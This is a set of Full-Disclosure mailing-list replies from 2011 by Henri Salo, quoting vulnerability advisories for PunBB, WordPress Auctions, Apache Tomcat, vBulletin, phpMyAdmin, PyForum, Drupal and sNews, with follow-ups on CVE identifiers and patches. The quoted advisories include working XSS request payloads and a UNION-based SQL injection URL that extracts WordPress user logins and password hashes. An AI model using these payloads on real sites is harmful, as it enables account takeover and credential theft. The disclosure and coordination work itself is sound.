> written consent. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically,
> please email me for permission.
> 
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS 
> condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct, 
> indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.

Fixed on: 
https://github.com/punbb/punbb/commit/dd50a50a2760f10bd2d09814e30af4b36052ca6d
PunBB 1.3.6 released: https://github.com/downloads/punbb/punbb/punbb-1.3.6.zip

I can request CVE-identifier for this issue.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PunBB PHP Forum - Multiple XSS

[Henri Salo]

On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote:
> ===
> PunBB PHP Forum - Multiple XSS
> ===
> 
> Affected Software : PunBB PHP Forum
> Severity  : Medium
> Local/Remote  : Remote
> Author: @drk1wi
> 
> [Summary]
> 
> Just for those whom it might concern.
> These vulnerabilities have been identified for the latest (clean 
> version 1.3.5) during one of my penetration tests.
> 
> [Vulnerability Details]
> 
> 
> GET 
> /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/>alert(oink)
> GET 
> /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/>alert(oink)
> 
> POST /delete.php?id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_confirm=>"'>alert(oink)&delete=>"'>alert(oink)
> 
> POST /edit.php?id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_message=>"'>alert(oink)&submit=>"'>alert(oink)
> 
> POST /login.php?action=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_email=>"'>alert(oink)&request_pass=>"'>alert(oink)
> 
> POST /misc.php?email=>"'>alert(oink)
> form_sent=>"'>alert(oink)&redirect_url=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_subject=>"'>alert(oink)&req_message=>"'>alert(oink)&submit=>"'>alert(oink)
> 
> POST 
> /profile.php?action=>"'>alert(oink)&id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_old_password=>"'>alert(oink)&req_new_password1=>"'>alert(oink)&req_new_password2=>"'>alert(oink)&update=>"'>alert(oink)
> 
> POST /register.php?action=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_username=>"'>alert(oink)&req_password1=>"'>alert(oink)&req_password2=>"'>alert(369448)&req_email1=>"'>alert(oink)&timezone=>"'>alert(oink)®ister=>"'>alert(oink)
> 
> 
> [Time-line]
> 
> 20/08/2011 - Vendor notified
> 02/09/2011 - No e-mail reply and BAN on Forum
> ???- Vendor patch release
> 16/09/2011 - Public disclosure
> 
> [Fix Information]
> 
> 
> Cheers,
> Piotr Duszynski (@drk1wi)
> http://sharpsec.net
> 
> X. LEGAL NOTICES
> 
> Copyright (c) 2011 Piotr "drk1wi" Duszynski
> 
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without mine express
> written consent. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically,
> please email me for permission.
> 
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS 
> condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct, 
> indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.

http://punbb.informer.com/forums/topic/24427/multiple-xss-vulnerabilities/

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PunBB PHP Forum - Multiple XSS

[Henri Salo]

On Fri, Sep 16, 2011 at 06:43:47PM +0200, Piotr Duszynski wrote:
> ===
> PunBB PHP Forum - Multiple XSS
> ===
> 
> Affected Software : PunBB PHP Forum
> Severity  : Medium
> Local/Remote  : Remote
> Author: @drk1wi
> 
> [Summary]
> 
> Just for those whom it might concern.
> These vulnerabilities have been identified for the latest (clean 
> version 1.3.5) during one of my penetration tests.
> 
> [Vulnerability Details]
> 
> 
> GET 
> /login.php?action=out&id=3&csrf_token=4b072f27396cec5d79"/>alert(oink)
> GET 
> /misc.php?action=markforumread&fid=1&csrf_token=c173cabad786"/>alert(oink)
> 
> POST /delete.php?id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_confirm=>"'>alert(oink)&delete=>"'>alert(oink)
> 
> POST /edit.php?id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_message=>"'>alert(oink)&submit=>"'>alert(oink)
> 
> POST /login.php?action=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_email=>"'>alert(oink)&request_pass=>"'>alert(oink)
> 
> POST /misc.php?email=>"'>alert(oink)
> form_sent=>"'>alert(oink)&redirect_url=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_subject=>"'>alert(oink)&req_message=>"'>alert(oink)&submit=>"'>alert(oink)
> 
> POST 
> /profile.php?action=>"'>alert(oink)&id=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_old_password=>"'>alert(oink)&req_new_password1=>"'>alert(oink)&req_new_password2=>"'>alert(oink)&update=>"'>alert(oink)
> 
> POST /register.php?action=>"'>alert(oink)
> form_sent=>"'>alert(oink)&csrf_token=>"'>alert(oink)&req_username=>"'>alert(oink)&req_password1=>"'>alert(oink)&req_password2=>"'>alert(369448)&req_email1=>"'>alert(oink)&timezone=>"'>alert(oink)®ister=>"'>alert(oink)
> 
> 
> [Time-line]
> 
> 20/08/2011 - Vendor notified
> 02/09/2011 - No e-mail reply and BAN on Forum
> ???- Vendor patch release
> 16/09/2011 - Public disclosure
> 
> [Fix Information]
> 
> 
> Cheers,
> Piotr Duszynski (@drk1wi)
> http://sharpsec.net
> 
> X. LEGAL NOTICES
> 
> Copyright (c) 2011 Piotr "drk1wi" Duszynski
> 
> Permission is granted for the redistribution of this alert
> electronically. It may not be edited in any way without mine express
> written consent. If you wish to reprint the whole or any
> part of this alert in any other medium other than electronically,
> please email me for permission.
> 
> Disclaimer: The information in the advisory is believed to be accurate
> at the time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS 
> condition.
> There are no warranties with regard to this information. Neither the
> author nor the publisher accepts any liability for any direct, 
> indirect,
> or consequential loss or damage arising from use of, or reliance on,
> this information.

I also reported these vulnerabilities to PunBB PHP Forum developers using 
http://punbb.informer.com/bugreport.php. Let's see what they answer. Have they 
replied anything to you yet?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WordPress Auctions plugin <= 1.8.8 SQL Injection Vulnerability

[Henri Salo]

On Wed, Sep 14, 2011 at 04:06:26PM -0300, Heyder[AlligatorTeam] wrote:
> # Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection
> Vulnerability
> # Date: 2011-09-09
> # Author: sherl0ck_ 
> @AlligatorTeam
> # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip
> # Version: 1.8.8 (tested)
> 
> ---
> PoC
> ---
> 
> URL:
> http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e
> 
> ---
> Vulnerable code
> ---
> ...
> elseif($_GET["wpa_action"] == "edit"):
> $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> ...
> elseif($_GET["wpa_action"] == "relist"):
> $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> ...
> $resultList = $wpdb->get_row($strSQL);
> ...

Module owner replied:

"Thanks for raising this with us. The report is right in pointing out that 
those parameters aren't sanitised (which we will address immediately). It's 
work pointing out though, that this is an administration module (protected by 
WordPress's user permissions); rather than one that can be access anonymously."

Follow-up: 
http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WordPress Auctions plugin <= 1.8.8 SQL Injection

[Henri Salo]

On Wed, Sep 14, 2011 at 08:12:33PM +0300, Henri Salo wrote:
> On Wed, Sep 14, 2011 at 12:04:03PM -0300, Heyder[AlligatorTeam] wrote:
> > # Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection
> > Vulnerability
> > # Date: 2011-09-09
> > # Author: sherl0ck_ 
> > @AlligatorTeam
> > # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip
> > # Version: 1.8.8 (tested)
> > 
> > ---
> > PoC
> > ---
> > 
> > URL:
> > http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e
> > 
> > ---
> > Vulnerable code
> > ---
> > ...
> > elseif($_GET["wpa_action"] == "edit"):
> > $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> > ...
> > elseif($_GET["wpa_action"] == "relist"):
> > $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> > ...
> > $resultList = $wpdb->get_row($strSQL);
> > ...
> 
> Did you report this issue to the author of the plugin?
> 
> Best regards,
> Henri Salo

Module owner replied:

"Thanks for raising this with us. The report is right in pointing out that 
those parameters aren't sanitised (which we will address immediately). It's 
work pointing out though, that this is an administration module (protected by 
WordPress's user permissions); rather than one that can be access anonymously."

Follow-up: 
http://wordpress.org/support/topic/plugin-wp-auctions-wordpress-auctions-plugin?replies=3#post-2341622

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] WordPress Auctions plugin <= 1.8.8 SQL Injection

[Henri Salo]

On Wed, Sep 14, 2011 at 12:04:03PM -0300, Heyder[AlligatorTeam] wrote:
> # Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection
> Vulnerability
> # Date: 2011-09-09
> # Author: sherl0ck_ 
> @AlligatorTeam
> # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip
> # Version: 1.8.8 (tested)
> 
> ---
> PoC
> ---
> 
> URL:
> http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e
> 
> ---
> Vulnerable code
> ---
> ...
> elseif($_GET["wpa_action"] == "edit"):
> $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> ...
> elseif($_GET["wpa_action"] == "relist"):
> $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"];
> ...
> $resultList = $wpdb->get_row($strSQL);
> ...

Did you report this issue to the author of the plugin?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [SECURITY] CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure

[Henri Salo]

On Wed, Aug 31, 2011 at 01:22:51PM +0300, Henri Salo wrote:
> On Mon, Aug 29, 2011 at 08:52:00PM +0100, Mark Thomas wrote:
> > CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure
> > 
> > Severity: Important
> > 
> > Vendor: The Apache Software Foundation
> > 
> > Versions Affected:
> > - Tomcat 7.0.0 to 7.0.20
> > - Tomcat 6.0.0 to 6.0.33
> > - Tomcat 5.5.0 to 5.5.33
> > - Earlier, unsupported versions may also be affected
> > 
> > Description:
> > Apache Tomcat supports the AJP protocol which is used with reverse
> > proxies to pass requests and associated data about the request from the
> > reverse proxy to Tomcat. The AJP protocol is designed so that when a
> > request includes a request body, an unsolicited AJP message is sent to
> > Tomcat that includes the first part (or possibly all) of the request
> > body. In certain circumstances, Tomcat did not process this message as a
> > request body but as a new request. This permitted an attacker to have
> > full control over the AJP message which allowed an attacker to (amongst
> > other things):
> > - insert the name of an authenticated user
> > - insert any client IP address (potentially bypassing any client IP
> > address filtering)
> > - trigger the mixing of responses between users
> > 
> > The following AJP connector implementations are not affected:
> > org.apache.jk.server.JkCoyoteHandler (5.5.x - default, 6.0.x - default)
> > 
> > The following AJP connector implementations are affected:
> > 
> > org.apache.coyote.ajp.AjpProtocol (6.0.x, 7.0.x - default)
> > org.apache.coyote.ajp.AjpNioProtocol (7.0.x)
> > org.apache.coyote.ajp.AjpAprProtocol (5.5.x, 6.0.x, 7.0.x)
> > 
> > Further, this issue only applies if all of the following are are true
> > for at least one resource:
> > - POST requests are accepted
> > - The request body is not processed
> > 
> > 
> > Example: See https://issues.apache.org/bugzilla/show_bug.cgi?id=51698
> > 
> > Mitigation:
> > Users of affected versions should apply one of the following mitigations:
> > - Upgrade to a version of Apache Tomcat that includes a fix for this
> > issue when available
> > - Apply the appropriate patch
> >   - 7.0.x http://svn.apache.org/viewvc?rev=1162958&view=rev
> >   - 6.0.x http://svn.apache.org/viewvc?rev=1162959&view=rev
> >   - 5.5.x http://svn.apache.org/viewvc?rev=1162960&view=rev
> > - Configure the reverse proxy and Tomcat's AJP connector(s) to use the
> > requiredSecret attribute
> > - Use the org.apache.jk.server.JkCoyoteHandler AJP connector (not
> > available for Tomcat 7.0.x)
> > 
> > Credit:
> > The issue was reported via Apache Tomcat's public issue tracker.
> > The Apache Tomcat security team strongly discourages reporting of
> > undisclosed vulnerabilities via public channels. All Apache Tomcat
> > security vulnerabilities should be reported to the private security team
> > mailing list: secur...@tomcat.apache.org
> > 
> > References:
> > http://tomcat.apache.org/security.html
> > http://tomcat.apache.org/security-7.html
> > http://tomcat.apache.org/security-6.html
> > http://tomcat.apache.org/security-5.html
> > https://issues.apache.org/bugzilla/show_bug.cgi?id=51698
> 
> Do you have any information when the supported security release is going to 
> be announced? Patching production using diff from SVN is not usually very 
> nice :)
> 
> Best regards,
> Henri Salo

Version 7.0.21 is available:

http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/download-70.cgi

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [SECURITY] [DSA 2200-1] nss security update

[Henri Salo]

On Fri, Sep 02, 2011 at 11:03:17AM +0200, Dimitry Andric wrote:
> On 2011-08-31 20:37, Packet Storm wrote:
> > Is this supposed to be DSA-2201-1 and not DSA-2200-1?
> >
> > DSA-2200-1 already exists as an Iceweasel advisory..
> 
> You would really expect DSA-2299 to be followed by DSA-2300, but
> apparently there was an overflow. ;)

You should see:

http://testing-security.debian.net/
http://anonscm.debian.org/viewvc/secure-testing/data/DSA/list?revision=17150&view=markup

DSA "process" is quite open for everyone interested.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [SECURITY] CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure

[Henri Salo]

On Mon, Aug 29, 2011 at 08:52:00PM +0100, Mark Thomas wrote:
> CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure
> 
> Severity: Important
> 
> Vendor: The Apache Software Foundation
> 
> Versions Affected:
> - Tomcat 7.0.0 to 7.0.20
> - Tomcat 6.0.0 to 6.0.33
> - Tomcat 5.5.0 to 5.5.33
> - Earlier, unsupported versions may also be affected
> 
> Description:
> Apache Tomcat supports the AJP protocol which is used with reverse
> proxies to pass requests and associated data about the request from the
> reverse proxy to Tomcat. The AJP protocol is designed so that when a
> request includes a request body, an unsolicited AJP message is sent to
> Tomcat that includes the first part (or possibly all) of the request
> body. In certain circumstances, Tomcat did not process this message as a
> request body but as a new request. This permitted an attacker to have
> full control over the AJP message which allowed an attacker to (amongst
> other things):
> - insert the name of an authenticated user
> - insert any client IP address (potentially bypassing any client IP
> address filtering)
> - trigger the mixing of responses between users
> 
> The following AJP connector implementations are not affected:
> org.apache.jk.server.JkCoyoteHandler (5.5.x - default, 6.0.x - default)
> 
> The following AJP connector implementations are affected:
> 
> org.apache.coyote.ajp.AjpProtocol (6.0.x, 7.0.x - default)
> org.apache.coyote.ajp.AjpNioProtocol (7.0.x)
> org.apache.coyote.ajp.AjpAprProtocol (5.5.x, 6.0.x, 7.0.x)
> 
> Further, this issue only applies if all of the following are are true
> for at least one resource:
> - POST requests are accepted
> - The request body is not processed
> 
> 
> Example: See https://issues.apache.org/bugzilla/show_bug.cgi?id=51698
> 
> Mitigation:
> Users of affected versions should apply one of the following mitigations:
> - Upgrade to a version of Apache Tomcat that includes a fix for this
> issue when available
> - Apply the appropriate patch
>   - 7.0.x http://svn.apache.org/viewvc?rev=1162958&view=rev
>   - 6.0.x http://svn.apache.org/viewvc?rev=1162959&view=rev
>   - 5.5.x http://svn.apache.org/viewvc?rev=1162960&view=rev
> - Configure the reverse proxy and Tomcat's AJP connector(s) to use the
> requiredSecret attribute
> - Use the org.apache.jk.server.JkCoyoteHandler AJP connector (not
> available for Tomcat 7.0.x)
> 
> Credit:
> The issue was reported via Apache Tomcat's public issue tracker.
> The Apache Tomcat security team strongly discourages reporting of
> undisclosed vulnerabilities via public channels. All Apache Tomcat
> security vulnerabilities should be reported to the private security team
> mailing list: secur...@tomcat.apache.org
> 
> References:
> http://tomcat.apache.org/security.html
> http://tomcat.apache.org/security-7.html
> http://tomcat.apache.org/security-6.html
> http://tomcat.apache.org/security-5.html
> https://issues.apache.org/bugzilla/show_bug.cgi?id=51698

Do you have any information when the supported security release is going to be 
announced? Patching production using diff from SVN is not usually very nice :)

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available

[Henri Salo]

On Wed, Aug 10, 2011 at 12:23:49PM -0400, T Biehn wrote:
> Maybe he should build a vulnerability into each version, so he can announce
> each new version with the disclosure and satisfy your constraints.

After this he will get friends to his home. Not so happy friends..

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VBulletin adminCP Cross Site Scripting

[Henri Salo]

On Wed, Aug 03, 2011 at 06:37:32PM +0600, HAroon . wrote:
> *Advisory Information*
> 
> Title: vBulletin Cross Site Scripting Vulnerability
> 
> Date published: 02-08-2011
> 
> Vendors contacted: vBulletin team
> 
>  
> 
> *Vulnerability Information*
> 
> Class: XSS flaw
> 
> Vulnerable page: Admin Login Page (admincp)
> 
> Remotely Exploitable: Yes
> 
> Locally Exploitable: No
> 
>  
> 
> *Vulnerability Description*
> 
> vBulletin is a community forum solution for a wide range of users,
> including industry leading companies. A XSS vulnerability has been discovered
> that could allow an attacker to carry out an action impersonating a legal 
> user,
> or to obtain access to a user's account.
> 
> This flaw allows unauthorized disclosure and modification of information,
> and it allows disruption of service.
> 
>  
> 
> *Vulnerable versions*
> 
> 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1
> 
>  
> 
> *Non-vulnerable Packages*
> 
> . vBulletin prior to 4.1.3
> 
> *Vendor Information, Solutions and Workarounds*
> 
> vBulletin team has released patches for this flaw and patch is released on
> 02-08-2011. 
> https://www.vbulletin.com/forum/showthread.php/385133-vBulletin-4.1.3-4.1.4-and-4.1.5-Security-Patch
> 
>  
> 
> *Credits*
> 
> This vulnerability was discovered by Muhammad Haroon from Innovative
> Solutions KSA. OWASP Chapter Lead of Pakistan. haroon [at] live [dot] it
> 
>  
> 
> *Proof of Concept Code*
> 
> This is a Cross Site Scripting (XSS) vulnerability within vBulletin
> community forum solution. In order to exploit this flaw following vector would
> be used.
> 
>  
> http://www.example.com/forums/admincp/?";>alert('Xss_found_By_M.Haroon')
> 
>  
> 
> *Report Timeline*
> 
> 30-07-2011: Notifies the vBulletin team about the vulnerability.
> 31-07-2011: vBulletin Team ask for technical description about the flaw
> 31-07-2011: Technical Details sent to vbulletin team
> 02-08-2011: vBulletin notifies that a fix has been produced and is
> available to the users on 2nd August 2011
> 03-08-2011: Vulnerability publicly disclosed.

Did you request CVE-ID for this issue?

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] phpMyAdmin 3.x Conditional Session Manipulation

[Henri Salo]

On Sun, Jul 24, 2011 at 06:10:00PM +0200, Mango wrote:
> ###
> 
> phpMyAdmin 3.x Conditional Session Manipulation
>   
> ###[ Advisory from 
> ]###
> 
> #¨¨##¨#.¨¨¨
> ¨¨'::###'¨:##:¨'###¨¨'###.¨
> '###.¨¨.##'¨¨¨¨¨######¨
> ¨'###..##'¨¨¨##¨¨#¨¨.#.¨¨¨..#¨¨¨___¨¨:#'##:¨######¨
> ¨¨'#'¨'###:¨¨:##'¨.##''¨''##.¨##.#'¨¨##¨###¨¨¨.###¨
> ¨¨¨'###:'##..#'¨¨.##'¨'##.¨###''¨'##'¨¨¨:#¨¨¨##::¨¨
> ¨¨¨..'###'¨¨¨###¨¨¨###¨##¨¨¨#'¨¨¨:#####¨¨¨'###.
> ¨¨.##'###..##.¨¨¨###¨¨¨###¨##¨¨::¨¨¨###'###
> ¨.##'¨'###.¨¨.#'##.¨¨###¨¨¨###¨##¨¨#'¨:##¨¨¨###¨###
> .##'¨¨¨'###..#'¨'##.¨'##¨¨.##'¨##¨:#¨¨¨##:¨¨###.###
> ¨¨.###:¨:..##:¨¨¨:###.'##..¨..##'¨.##.¨¨¨.##.¨.###..###.¨¨.###'
> ¨¨¨¨###''#''¨###¨¨¨###¨¨¨###'¨¨
> 
> [ www.Xxor.se 
> ]
> 
> Application: phpMyAdmin 3.x
> Patched ver: 3.3.10.3 and 3.4.3.2
> Severity:Low
> Exploitable: Remote
> PMASA ID:PMASA-2011-12
> 
> 
> [ Description 
> ]
> 
> If the Swekey extention is activated a remote attacker can manipulate the
> variables in the the global namespace.
> 
> 
> [ Fix 
> ]####
> 
> Upgrade to version 3.3.10.3 or 3.4.3.2.
> Or apply patches available at: http://www.phpmyadmin.net/home_page/security/
> 
> 
> #[ Timeline 
> ]##
> 
> 2011-07-07 - Reported to vendor
> 2011-07-23 - Patch available
> 2011-07-24 - Disclosed

This issue can be refered as CVE-2011-2719.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [BMSA-2009-07] Backdoor in PyForum

[Henri Salo]

On Mon, Nov 30, 2009 at 09:06:44PM +0700, Nam Nguyen wrote:
> BLUE MOON SECURITY ADVISORY 2009-07
> ===
> 
> 
> :Title: Backdoor in PyForum
> :Severity: Critical
> :Reporter: Blue Moon Consulting
> :Products: PyForum v1.0.3
> :Fixed in: --
> 
> 
> Description
> ---
> 
> pyForum is a 100% python-based message board system based in the excellent 
> web2py framework.
> 
> We have discovered a backdoor in PyForum. Anyone could force a password reset 
> on behalf of other users whose emails are known. More importantly, the 
> software author, specifically, can obtain the new Administrator's password 
> remotely.
> 
> The problem is in module ``forumhelper.py``. A new password is generated and 
> saved in the database. Then a notification email which contains this new 
> password in plaintext is sent to the user. There is no password reset 
> confirmation code or similar verification action required. This causes a mild 
> annoyance, or at most an account lockout.
> 
> When it comes to Administrator account, however, the problem is more severe. 
> This default account's email is set to ``administra...@pyforum.org`` and can 
> only be changed directly in the database. Therefore, new password is sent to 
> the software author by default. And since this email address is known, 
> everyone can request a password reset easily.
> 
> This bug may exist in older versions and in zForum, from which pyForum 
> derives, too.
> 
> Workaround
> --
> 
> Change Administrator's email address immediately and do not publish it 
> anywhere.
> 
> Fix
> ---
> 
> There is no fix at the moment.
> 
> Disclosure
> --
> 
> Blue Moon Consulting adapts `RFPolicy v2.0 
> <http://www.wiretrip.net/rfp/policy.html>`_ in notifying vendors.
> 
> Considered this *an intentional backdoor*, we decided to alert the public 
> immediately.
> 
> :Initial vendor contact:
> 
>   --
> 
> :Vendor response:
> 
>   --
> 
> :Further communication:
> 
>   --
> 
> :Public disclosure: November 30, 2009
> 
> :Exploit code:
> 
>   No exploit code required.
> 
> Disclaimer
> --
> 
> The information provided in this advisory is provided "as is" without 
> warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, 
> either express or implied, including the warranties of merchantability and 
> fitness for a particular purpose. Your use of the information on the advisory 
> or materials linked from the advisory is at your own risk. Blue Moon 
> Consulting Co., Ltd reserves the right to change or update this notice at any 
> time.

CVE-2009-5025 has been assigned for this issue.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Drupal Data Module Multiple Vulnerabilities

[Henri Salo]

On Wed, Feb 09, 2011 at 12:40:29PM -0500, Justin Klein Keane wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> Description of Vulnerability:
> 
> Drupal (http://drupal.org) is a robust content management system (CMS)
> written in PHP and MySQL. The Drupal Data module
> (http://drupal.org/project/data) "helps you model, manage and query
> related sets of tables. It offers an administration interface and a low
> level API for manipulating tables and accessing their contents."
> 
> The Data module contains multiple Cross Site Scripting (XSS)
> vulnerabilities because it fails to sanitize table descriptions, field
> names or labels before display.  This results in multiple stored XSS as
> well as DOM based XSS vulnerabilities.  Drupal site users with the
> ability to create or edit tables using the Data module could inject
> arbitrary HTML into administrative pages.
> 
> The Data module also contains numerous SQL injection vulnerabilities
> because it fails to sanitize values for table names or column names
> before invoking SQL statements.  This allows users with the ability to
> create or edit tables managed by the Data module to perform SQL
> injection attacks.
> 
> Systems affected:
> 
> Drupal 6.20 with Data 6.x-1.0-alpha14 was tested and shown to be vulnerable.
> 
> Impact
> 
> User could inject arbitrary scripts into pages affecting site users.
> This could result in administrative account compromise leading to web
> server process compromise. A more likely scenario would be for an
> attacker to inject hidden content (such as iframes, applets, or embedded
> objects) that would attack client browsers in an attempt to compromise
> site users' machines. This vulnerability could also be used to launch
> cross site request forgery (XSRF) attacks against the site that could
> have other unexpected consequences.
> 
> Mitigating factors:
> 
> In order to exploit this vulnerability the attacker must have
> credentials to an authorized account that has been assigned the
> permissions to administer or edit in the Data module. This could be
> accomplished via social engineering, brute force password guessing, or
> abuse or legitimate credentials.
> 
> Vendor response:
> 
> Drupal security team does not handle issues with pre-release versions of
> modules (such as alpha or dev). These issues were reported in the
> module's public issue queue (http://drupal.org/node/1056470).
> 
> The text of this advisory has also been posted at
> http://www.madirish.net/?article=480
> 
> - -- 
> Justin C. Klein Keane
> http://www.MadIrish.net

Does this issue have CVE-identifier? I can request CVE-identifier if there 
isn't one.

Best regards,
Henri Salo

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [Bkis] sNews 1.7.1 XSS vulnerability

[Henri Salo]

On Thu, May 12, 2011 at 09:59:16AM +0700, Bkis wrote:
> 1. General Information
> 
> sNews is a free content management system (CMS) written in PHP and MySQL. It 
> is available at http://snewscms.com/. In April 2011, Bkis Security discovered 
> an XSS (Cross-site Scripting) vulnerability in sNews CMS version 1.7.1. 
> Taking advantage of this vulnerability, hacker might execute malicious code 
> or get cookie of CMS’s administrator.
> 
> Details: http://security.bkis.com/snews-1-7-1-xss-vulnerability/
> SVRT Advisory:Bkis 01-2011
> Initial vendor notification:  01/05/2011
> Release Date: 12/05/2011
> Update Date:  12/05/2011
> Discovered by:Cao Xuan Sang - Bkis
> Attack Type:  XSS
> Security Rating:  High
> Impact:   Code Execution
> Affected Software:sNews 1.7.1 ( possibly in some earlier versions )
> 
> 2. Technical Descriptions
> 
> XSS vulnerability exists in “reorder” functions of administrator: Categories 
> reorder, Articles reorder and Pages reorder. Here, input variables are not 
> adequately checked and filtered before querying the database. Then if a 
> special character is added to the value, the SQL query will have wrong 
> syntax, and the erroneous notification is displayed in the browser 
> accompanied with the value of the erroneous variable and the erroneous query, 
> causing XSS vulnerability.
> It is the administrators that are affected by this vulnerability. With 
> different scenarios, hacker is able to steal the Administrator’s cookie or 
> redirect the browser to a malicious website, etc. 
> 
> 3. Solution
> sNews’s development team has not issued the patches for this vulnerability 
> yet. Thus, Bkis recommends individuals and organizations use this software 
> and fix the flaw as the below solution:
> Search in file snews.php:
>   $type_id = str_replace($remove,'',$key);
> Then, add the code below:
>   $value = clean(cleanXSS(trim($value)));
> 
> 4. About Bkis
> Bkis is Vietnamese leading Company in researching, deploying network security 
> software and solutions.
